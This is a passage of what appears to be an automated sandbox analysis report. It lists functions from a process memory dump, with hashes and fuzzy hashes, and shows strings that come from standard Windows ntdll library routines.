                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7f56c50d24e7d9e68aa073b7627bfcef2572cb943542f0cb61fcf7c8340629dc
                • Instruction ID: e7b4eb0bd66304441a14f44b76c3e2da812f38b7090069f9fcb93d6cce4969a3
                • Opcode Fuzzy Hash: 7f56c50d24e7d9e68aa073b7627bfcef2572cb943542f0cb61fcf7c8340629dc
                • Instruction Fuzzy Hash: 9190022124546202D150715C440561A4045BBF0201F95C022E0814595DCA6589956321
                Function 01412B60 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 41c0a85887bff693f0805b79f594e6f1265e67860f30ebfa9160f9170805ed5b
                • Instruction ID: 896047e503fc7babdda34c61adc5cb1e08629b79aa6d6656b40146f05a6ef245
                • Opcode Fuzzy Hash: 41c0a85887bff693f0805b79f594e6f1265e67860f30ebfa9160f9170805ed5b
                • Instruction Fuzzy Hash: 619002612024110341057158441561A404A9BF0201B95C022E1014591DCA3589D16225
                Function 01412BE0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ad952f70be74aa1ecfd92c902af5041960ed462e1a4fedb0c4382e69ebcf301a
                • Instruction ID: 2c62a738f70398b71d84b095cc4f064f0a2fb216ba29b182a7c35f6eb3dc36e1
                • Opcode Fuzzy Hash: ad952f70be74aa1ecfd92c902af5041960ed462e1a4fedb0c4382e69ebcf301a
                • Instruction Fuzzy Hash: 7390023120545942D14071584405A4A00559BE0305F95C012E0064695DDB358E95B761
                Function 01412BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b474bb6462f5616b699dd3e3dca9c7aecbe03f391dba2e183be150a23926eff7
                • Instruction ID: 4acaebf85fea0e02c5eadcc458e9b0be65524891a57f8bfdb8a2665d46f2ac8c
                • Opcode Fuzzy Hash: b474bb6462f5616b699dd3e3dca9c7aecbe03f391dba2e183be150a23926eff7
                • Instruction Fuzzy Hash: 0090023120141902D1807158440564E00459BE1301FD5C016E0025655DCF258B9977A1
                Function 01412B80 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5da597f38c02b38b36c627f08cc86605f6c231db025cea10796148e53c972b40
                • Instruction ID: e9875ec9c1136c7b0c621c0275fcc36a7cf15454f4e9c2f61de554cdccac1dec
                • Opcode Fuzzy Hash: 5da597f38c02b38b36c627f08cc86605f6c231db025cea10796148e53c972b40
                • Instruction Fuzzy Hash: 7B90023120141902D1047158480568A00459BE0301F95C012E6024656EDB7589D17231
                Function 01412BA0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e648d092808889a14bc69e1507543b484566d6af4c85a28452a02b7516e8a54c
                • Instruction ID: 18f68960f8c9cf23d367df545f923be22c98ba2045b6d5f3649ce81727d3d602
                • Opcode Fuzzy Hash: e648d092808889a14bc69e1507543b484566d6af4c85a28452a02b7516e8a54c
                • Instruction Fuzzy Hash: 4B90023160541902D1507158441574A00459BE0301F95C012E0024655DCB658B9577A1
                Function 01412AD0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e984cb5b7415402585f0dbdade9c1cf694fee1159469eee7febe6afd97da209e
                • Instruction ID: 63e092eae401d43e078d29dd8ae684b884cdaeaab6ccad13e3e41c45adc19085
                • Opcode Fuzzy Hash: e984cb5b7415402585f0dbdade9c1cf694fee1159469eee7febe6afd97da209e
                • Instruction Fuzzy Hash: 89900225211411030105B558070550B00869BE5351395C022F1015551CDB3189A15221
                Function 01412AF0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8bae4a6072f9ced3ccbb608f2543c6178e2d4ba68492b25935a91ec112f86252
                • Instruction ID: 7d7c746ae1e9ffc4ef85ffa94319784f74d8bee95169ab2e40e0ed0d8ff8732c
                • Opcode Fuzzy Hash: 8bae4a6072f9ced3ccbb608f2543c6178e2d4ba68492b25935a91ec112f86252
                • Instruction Fuzzy Hash: 6E900225221411020145B558060550F0485ABE63513D5C016F1416591CCB3189A55321
                Function 01412AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d8dd043f0655540897a1b99a8a1b36e279cd1a878467c749c47d02642ddb3855
                • Instruction ID: 688db5ee8bdb0775abc2470fc7a90b4b89c67b1208fc1bca1579637f6d2b51cf
                • Opcode Fuzzy Hash: d8dd043f0655540897a1b99a8a1b36e279cd1a878467c749c47d02642ddb3855
                • Instruction Fuzzy Hash: 7C9002A1201551924500B2588405B0E45459BF0201B95C017E1054561CCA3589919235
                Function 01413D70 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e457d13007697aecc11de3875e7e01f0d851c0c205c5eba8149a729459c5679b
                • Instruction ID: 6135fc2a36a637eb25097a254b7f01aae29bab2fb22775a52e7833405a00c0af
                • Opcode Fuzzy Hash: e457d13007697aecc11de3875e7e01f0d851c0c205c5eba8149a729459c5679b
                • Instruction Fuzzy Hash: FF90023520141502D5107158580564A00869BE0301F95D412E0424559DCB6489E1A221
                Function 01412D00 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 06d20005889d082c45fb4a6cec7c9f788889a00e53d71b850a873d80df5ff5fa
                • Instruction ID: 915fce549cdd4a1673146e1db11d9aed06a6f71fda0862194c72b3b2df370fdd
                • Opcode Fuzzy Hash: 06d20005889d082c45fb4a6cec7c9f788889a00e53d71b850a873d80df5ff5fa
                • Instruction Fuzzy Hash: C390022120545542D10075585409A0A00459BE0205F95D012E1064596DCB358991A231
                Function 01412D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c2debca2b591194329d900bd7c5364bc8ffd4958571ef207afe43ae323c74316
                • Instruction ID: 0efd6e23d214f6db36ea9595dce118b5bf52e71f9534d32e2794253d0ce0bbfc
                • Opcode Fuzzy Hash: c2debca2b591194329d900bd7c5364bc8ffd4958571ef207afe43ae323c74316
                • Instruction Fuzzy Hash: 9290022921341102D1807158540960E00459BE1202FD5D416E0015559CCE2589A95321
                Function 01413D10 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c252f69d391bf0ba5517534d0d0a07065739d5279c7b6aa518c6db51784d82bd
                • Instruction ID: 964579587334663cce323a0dd9d60dabf30e9516381cb62101e467a8fe575391
                • Opcode Fuzzy Hash: c252f69d391bf0ba5517534d0d0a07065739d5279c7b6aa518c6db51784d82bd
                • Instruction Fuzzy Hash: 5B90023120241242954072585805A4E41459BF1302BD5D416E0015555CCE2489A15321
                Function 01412D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e69498545271a8cb7a57ab517de11c9f63cc918af5c30a6dc82653f4c0fc91fe
                • Instruction ID: 14aaf7c2a2cbd49d0394e43358893699ddfe68e329c31ee75eb9f55aa7f99079
                • Opcode Fuzzy Hash: e69498545271a8cb7a57ab517de11c9f63cc918af5c30a6dc82653f4c0fc91fe
                • Instruction Fuzzy Hash: D690022130141103D1407158541960A4045EBF1301F95D012E0414555CDE2589965322
                Function 01412DD0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5881365d22ce2f0c363377e842865b430f6a5cad5ee6e28e4f9e1e27c8ded426
                • Instruction ID: b33f7b66dfc4fdcad82571de4817a34bdfc1406293e13c8ea65631c5384197d8
                • Opcode Fuzzy Hash: 5881365d22ce2f0c363377e842865b430f6a5cad5ee6e28e4f9e1e27c8ded426
                • Instruction Fuzzy Hash: 2E900221242452525545B158440550B4046ABF02417D5C013E1414951CCA369996D721
                Function 01412DB0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d83d809a1317842ff6534e03dfba2336f4c9de074fd1eaa1be7dbd95a786a340
                • Instruction ID: 1fee5f940881aafbdf5500c12992a06c36ccf5cb35e22b61b330c61c3b77c7cd
                • Opcode Fuzzy Hash: d83d809a1317842ff6534e03dfba2336f4c9de074fd1eaa1be7dbd95a786a340
                • Instruction Fuzzy Hash: 3C90023124141502D1417158440560A0049ABE0241FD5C013E0424555ECB658B96AB61
                Function 01412C60 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 193a6b60fdceb0db25ac81c6c69684cd4dae64447d950d72f9f60b9ff5babf62
                • Instruction ID: 1e3f3040356f96e633398d757f6cbcc65a88c2e4d7c4737ae08a965674921749
                • Opcode Fuzzy Hash: 193a6b60fdceb0db25ac81c6c69684cd4dae64447d950d72f9f60b9ff5babf62
                • Instruction Fuzzy Hash: B690023120141942D10071584405B4A00459BF0301F95C017E0124655DCB25C9917621
                Function 01412CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 17079b87d0b24ae5cc4a18f8174e77548a7ae420d4840b707d43c012e8ec18e8
                • Instruction ID: abf2e956363cd33a31764c3780a6bcd942ed3610d0593ff70f8e5c3911312090
                • Opcode Fuzzy Hash: 17079b87d0b24ae5cc4a18f8174e77548a7ae420d4840b707d43c012e8ec18e8
                • Instruction Fuzzy Hash: 5A90022160541502D1407158541970A00559BE0201F95D012E0024555DCB698B9567A1
                Function 01412CF0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7480f1533ae9822e8f21394d6183a3777c14528c9ea213589a708175118c14da
                • Instruction ID: 4f6e0e9000d1127d67662dd0b56ef88050fd08eeb7a6f346c40292f6c2ab050f
                • Opcode Fuzzy Hash: 7480f1533ae9822e8f21394d6183a3777c14528c9ea213589a708175118c14da
                • Instruction Fuzzy Hash: 2590023120141503D1007158550970B00459BE0201F95D412E0424559DDB6689916221
                Function 01412CA0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 43fa5a11307759a65bba0f2701d62df4ebde044a75ab4dab18bce1aaf63454c4
                • Instruction ID: 2a33f86236f69ed98554ae281a18f639648b1e7f79cea17d56d47001610d03f3
                • Opcode Fuzzy Hash: 43fa5a11307759a65bba0f2701d62df4ebde044a75ab4dab18bce1aaf63454c4
                • Instruction Fuzzy Hash: 5E90023120141502D1007598540964A00459BF0301F95D012E5024556ECB7589D16231
                Function 01412F60 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a49327b80663453f1e71d0b9a4ed782c65f25374d3c007bd91cd307b0a2ba27a
                • Instruction ID: 21f139c34a9e0596791523c092c63807a151bde98899be7d57a655ef3a493c46
                • Opcode Fuzzy Hash: a49327b80663453f1e71d0b9a4ed782c65f25374d3c007bd91cd307b0a2ba27a
                • Instruction Fuzzy Hash: 8490026121141142D1047158440570A00859BF1201F95C013E2154555CCA398DA15225
                Function 01412F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b2247a39d11a3274d794f6c665f16abec0e876e25b9c804fabdd813e122bfc24
                • Instruction ID: 238aab3bc5d03b0985a88b513c3059dbbaffa1e44adf9f902ece15dfcba482dd
                • Opcode Fuzzy Hash: b2247a39d11a3274d794f6c665f16abec0e876e25b9c804fabdd813e122bfc24
                • Instruction Fuzzy Hash: B590026134141542D10071584415B0A0045DBF1301F95C016E1064555DCB29CD926226
                Function 01412FE0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 50ce21beab5c955adae964e1b99dd0d6f5e1234694d5f3577de96be78cf93134
                • Instruction ID: af3c25d582378c8e77d39e6d80576f55f96df800356f6807a532bf0f5271d472
                • Opcode Fuzzy Hash: 50ce21beab5c955adae964e1b99dd0d6f5e1234694d5f3577de96be78cf93134
                • Instruction Fuzzy Hash: 0D900221211C1142D20075684C15B0B00459BE0303F95C116E0154555CCE2589A15621
                Function 01412F90 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bab24eb6d54080b53c3876fdf5faeae5586f5687802de4ca407e309913a0754b
                • Instruction ID: c53c588205404ef93338fb1f4152e2ce4e353dea4555c7671f60566a7511bdc5
                • Opcode Fuzzy Hash: bab24eb6d54080b53c3876fdf5faeae5586f5687802de4ca407e309913a0754b
                • Instruction Fuzzy Hash: 5590023120181502D1007158481570F00459BE0302F95C012E1164556DCB3589916671
                Function 01412FA0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2eb605a038862a91a435bd3997903eab120ea1794725c2c0d0b692227119c685
                • Instruction ID: 0369fc944a8f2592decb91c1b128897452a60cdb649a4d9f9465f1ba049162ce
                • Opcode Fuzzy Hash: 2eb605a038862a91a435bd3997903eab120ea1794725c2c0d0b692227119c685
                • Instruction Fuzzy Hash: 2590023120181502D1007158480974B00459BE0302F95C012E5164556ECB75C9D16631
                Function 01412FB0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 20d9401cfe1ab5823d42e0c5dbd84983d8d1522278073da990e98f0229b0c053
                • Instruction ID: c759cac84e2dea43367a50fc5e68491f5583ef613d819986f20aa8af3f2717b0
                • Opcode Fuzzy Hash: 20d9401cfe1ab5823d42e0c5dbd84983d8d1522278073da990e98f0229b0c053
                • Instruction Fuzzy Hash: 0F9002216014114241407168884590A4045BFF1211795C122E0998551DCA6989A55765
                Function 01412E30 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 933a53a7d1f50228d84c29d842fd212f3d5be5e7c56f36488e036346290a5dd5
                • Instruction ID: 5f3031ac4cdb739dc5c803f35d127d5d81984e69342352febe913ded7fed9994
                • Opcode Fuzzy Hash: 933a53a7d1f50228d84c29d842fd212f3d5be5e7c56f36488e036346290a5dd5
                • Instruction Fuzzy Hash: AF90022130141502D1027158441560A0049DBE1345FD5C013E1424556DCB358A93A232
                Function 01412EE0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6e01e15ce9dcdd0123f114417439100cf6696b8934b30e472434e5c914c5ff3d
                • Instruction ID: c08d84d60f576ddcf8e5c34d9ce74ede90503b00fae7ba2bd5100aff03b82163
                • Opcode Fuzzy Hash: 6e01e15ce9dcdd0123f114417439100cf6696b8934b30e472434e5c914c5ff3d
                • Instruction Fuzzy Hash: 6B90026120181503D1407558480560B00459BE0302F95C012E2064556ECF398D916235
                Function 01412E80 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 40caca910e632411ae6d135e1bf3f5b9cee8b193f9fb3194c44b1874f95b8b3c
                • Instruction ID: e7a68097b806f7327307dd2fdcb44b3e81695a2973b2ecd3baf71fe1b17eb4c8
                • Opcode Fuzzy Hash: 40caca910e632411ae6d135e1bf3f5b9cee8b193f9fb3194c44b1874f95b8b3c
                • Instruction Fuzzy Hash: 4890022160141602D1017158440561A004A9BE0241FD5C023E1024556ECF358AD2A231
                Function 01412EA0 Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b02bbcf7aaf27c9a5ef59eeb66982f18bb9322d673f3c6bbdfb3a6c99f00dcba
                • Instruction ID: 1be5414b8dc5f743ff60df7ad223cb730e2a59fe983234a9c331ef663c4797fc
                • Opcode Fuzzy Hash: b02bbcf7aaf27c9a5ef59eeb66982f18bb9322d673f3c6bbdfb3a6c99f00dcba
                • Instruction Fuzzy Hash: D590027120141502D1407158440574A00459BE0301F95C012E5064555ECB698ED56765
                Function 01412C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                • Instruction ID: 44706a6f7cc2539bc3ffdb999a7d8fe60d24cff611570a1b0ff6564c10acbe15
                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                • Instruction Fuzzy Hash:
                Function 01412890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID: ___swprintf_l
                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                • API String ID: 48624451-2108815105
                • Opcode ID: 82c994cf5cae305d2f5bf9a63d7d8a7eeec9b3c7b5c95b91dc8b0aee389167e6
                • Instruction ID: 3c666c8c602a7436c022e421479a2d93ca12310cacfdd06407e6e6c5aa8602e1
                • Opcode Fuzzy Hash: 82c994cf5cae305d2f5bf9a63d7d8a7eeec9b3c7b5c95b91dc8b0aee389167e6
                • Instruction Fuzzy Hash: F751D3B6A00116AFDB11DB9D8980D7FFBB8BB18240764822AE469D7755D374DE408BE0
                Function 01407630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                Download Yara Rule
                Strings
                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01444655
                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01444725
                • Execute=1, xrefs: 01444713
                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014446FC
                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01444742
                • ExecuteOptions, xrefs: 014446A0
                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01444787
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                • API String ID: 0-484625025
                • Opcode ID: 9288f749834beb8260f153de1bd99db3adeb50b605f6a5fbf6cccf4879fbe1b9
                • Instruction ID: 56d79bbbe2b13ddec0dbfd157f7e467f31e393aa242b5d655935a21e7f00c91b
                • Opcode Fuzzy Hash: 9288f749834beb8260f153de1bd99db3adeb50b605f6a5fbf6cccf4879fbe1b9
                • Instruction Fuzzy Hash: 77515E316002096AEF12DB9ADC95FBA37A8AF14355F0404BFE609972F1E770BA458F52
                Function 0141B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID: __aulldvrm
                • String ID: +$-$0$0
                • API String ID: 1302938615-699404926
                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction ID: 9f4e7bb922fc30c3dfd48fd2d46b1ad54a946f28fabd8ad5e688075d2d32057f
                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                • Instruction Fuzzy Hash: 5F81CF70E052498EEF258E6CC8907FEBBB1EF55720F18451BE865A73B9C7348841CB62
                Function 0140BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                Download Yara Rule
                Strings
                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01447B7F
                • RTL: Re-Waiting, xrefs: 01447BAC
                • RTL: Resource at %p, xrefs: 01447B8E
                Memory Dump Source
                • Source File: 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_13a0000_x.jbxd
                Similarity
                • API ID:
                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                • API String ID: 0-871070163
                • Opcode ID: f0de20c509b078644209f733e27839bb99cf48c05e178ed846b3bb60ac5024cc
